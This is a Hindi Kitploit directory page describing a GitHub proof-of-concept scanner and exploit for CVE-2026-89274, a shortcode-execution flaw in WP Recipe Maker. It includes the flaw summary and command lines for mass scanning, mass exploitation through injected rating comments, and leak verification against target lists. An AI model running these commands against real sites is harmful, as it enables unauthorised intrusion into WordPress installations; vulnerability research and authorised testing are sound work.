Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-89274 — Python PoC स्कैनर और CVE-2026-89274 के लिए एक्सप्लॉइट, जो WP Recipe Maker <=10.8.1 में रेसिपी रेटिंग टिप्पणियों और JSON-LD के माध्यम से एक अनधिकृत मनमाना शॉर्टकोड निष्पादन दोष है। | Kitploit
उपकरण/GitHubGitHub/murrez/cve-2026-89274
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणस्क्रिप्टिंग और स्वचालनवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmurrez/cve-2026-89274

CVE-2026-89274

Python PoC स्कैनर और CVE-2026-89274 के लिए एक्सप्लॉइट, जो WP Recipe Maker <=10.8.1 में रेसिपी रेटिंग टिप्पणियों और JSON-LD के माध्यम से एक अनधिकृत मनमाना शॉर्टकोड निष्पादन दोष है।

रिपॉजिटरी देखें
1 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-89274 — WP Recipe Maker मनमाना शॉर्टकोड निष्पादन

WP Recipe Maker में CVE-2026-89274 के लिए Python 3 PoC स्कैनर/एक्सप्लॉइट।

प्लगइनwp-recipe-maker
प्रभावित≤ 10.8.1
में ठीक किया गया10.8.2+
CVSS9.1 (गंभीर)
प्रमाणीकरणअनप्रमाणित (टिप्पणी सबमिट)
CWECWE-94

सारांश

WPRM_Metadata::sanitize_metadata() मेटाडेटा फ़ील्ड्स पर strip_shortcodes() से पहले do_shortcode() चलाता है। स्वीकृत रेसिपी रेटिंग टिप्पणियाँ (wprm-comment-rating) JSON-LD reviewBody को भरती हैं; इंजेक्ट किए गए शॉर्टकोड रेसिपी पेज लोड होने पर निष्पादित होते हैं और संरचित डेटा में आउटपुट लीक कर सकते हैं।

आवश्यकता: दुर्भावनापूर्ण टिप्पणी स्वीकृत होनी चाहिए (ऑटो-अप्रूव या मॉडरेटर)। एक्सप्लॉइट मोड --verify का उपयोग करके पुष्टि कर सकता है कि मार्कर JSON-LD reviewBody में दिखाई देता है।

आवश्यकताएँ

  • Python 3.9+
  • pip install -r requirements.txt

उपयोग

root@kitploit:~
pip install -r requirements.txt

# Check plugin version + recipe page with comment rating form
python poc.py -u https://target.example --mode check

# Mass check
python poc.py --list targets.example.txt --mode check --threads 30 --quiet

# Mass exploit from check output (candidates.jsonl)
python poc.py --list candidates.jsonl --mode exploit --threads 20 \
  --shortcode "[caption]PROBE[/caption]" --verify --quiet

# Single-target exploit + JSON-LD verification
python poc.py -u https://target.example --mode exploit \
  --recipe-url /some-post-with-recipe/ \
  --shortcode "[caption]PROBE[/caption]" --verify

# Verify after comment approval (marker from exploit JSON)
python poc.py -u https://target.example --mode verify \
  --recipe-url /some-post-with-recipe/ --marker wprm89274_abc12345

# Batch verify prior submissions (submitted_mass.txt format)
python poc.py --list submitted_mass.txt --mode verify --threads 30 --quiet \
  --output verify_submitted.jsonl --vuln-list verified_leaks.txt

submitted_mass.txt पंक्ति प्रारूप (verify मोड)

root@kitploit:~
https://target.example|https://target.example/recipe-post/|post=123|marker=wprm89274_abc12345

CLI विकल्प

विकल्पविवरण
-u, --urlएकल लक्ष्य बेस URL
--listURL सूची, candidates.jsonl, या submitted_mass.txt (verify)
--modecheck, exploit, या verify
--recipe-urlएम्बेडेड WPRM रेसिपी + टिप्पणियों वाला पोस्ट URL
--post-idWordPress comment_post_ID
--recipe-idWPRM रेसिपी ID (वैकल्पिक --use-api)
--shortcodeटिप्पणी टेक्स्ट में पेलोड (डिफ़ॉल्ट प्रोब शॉर्टकोड)
--markerVerify: JSON-LD में मार्कर सबस्ट्रिंग खोजें
--verifyExploit: सबमिट के बाद JSON-LD में लीक की पुष्टि करें
--use-apiPremium user-rating REST पथ भी आज़माएँ
--threads, -jमास कंकरेंसी (डिफ़ॉल्ट 20)
--outputJSONL परिणाम (डिफ़ॉल्ट cve_2026_89274_results.jsonl)
--vuln-listहिट/लीक के लिए टेक्स्ट आउटपुट (डिफ़ॉल्ट hits.txt)
--candidates-listCheck हिट मेटाडेटा (डिफ़ॉल्ट candidates.jsonl)
--quietमास रन पर कम प्रगति आउटपुट

आउटपुट (मास चेक)

फ़ाइलसामग्री
cve_2026_89274_results.jsonlप्रति-लक्ष्य JSON
hits.txtउम्मीदवार बेस URL
candidates.jsonlpage_url, post_id, recipe_id, version

सामान्य status मान (check)

स्थितिअर्थ
candidateकमज़ोर संस्करण + wprm-comment-rating वाला रेसिपी पेज
plugin_no_recipe_commentsप्लगइन मौजूद, कोई उपयुक्त रेसिपी/टिप्पणी पेज नहीं मिला
recipe_no_comment_ratingरेटिंग टिप्पणी फ़ॉर्म के बिना रेसिपी पेज
patchedसंस्करण ≥ 10.8.2
no_pluginWP Recipe Maker का पता नहीं चला

सीमाएँ

  • शॉर्टकोड प्रभाव अन्य इंस्टॉल किए गए प्लगइन/थीम पर निर्भर करता है; हानिरहित प्रोब (जैसे [caption]) का उपयोग करें।
  • कई FOFA/सूची लक्ष्य पैच किए गए हैं या सार्वजनिक रेटिंग फ़ॉर्म नहीं रखते।
  • आर्काइव URL (/blog/, /recipes/) JSON-LD लीक नहीं दिखा सकते; पेज खोजते समय एक्सप्लॉइट एकल रेसिपी परमालिंक को प्राथमिकता देता है।
  • --verify केवल JSON-LD प्रतिबिंब की पुष्टि करता है, पूर्ण RCE की नहीं।

रिपॉज़िटरी लेआउट

root@kitploit:~
.
├── poc.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

स्थानीय स्कैन सूचियाँ और रन आर्टिफ़ैक्ट्स (list.txt, *.jsonl, submitted_mass.txt, …) .gitignore में हैं और इन्हें कमिट नहीं किया जाना चाहिए।

कानूनी

केवल अधिकृत सुरक्षा परीक्षण के लिए। लागू कानूनों और कार्यक्रम नियमों के अनुपालन की ज़िम्मेदारी आपकी है।

टूल डाउनलोड करें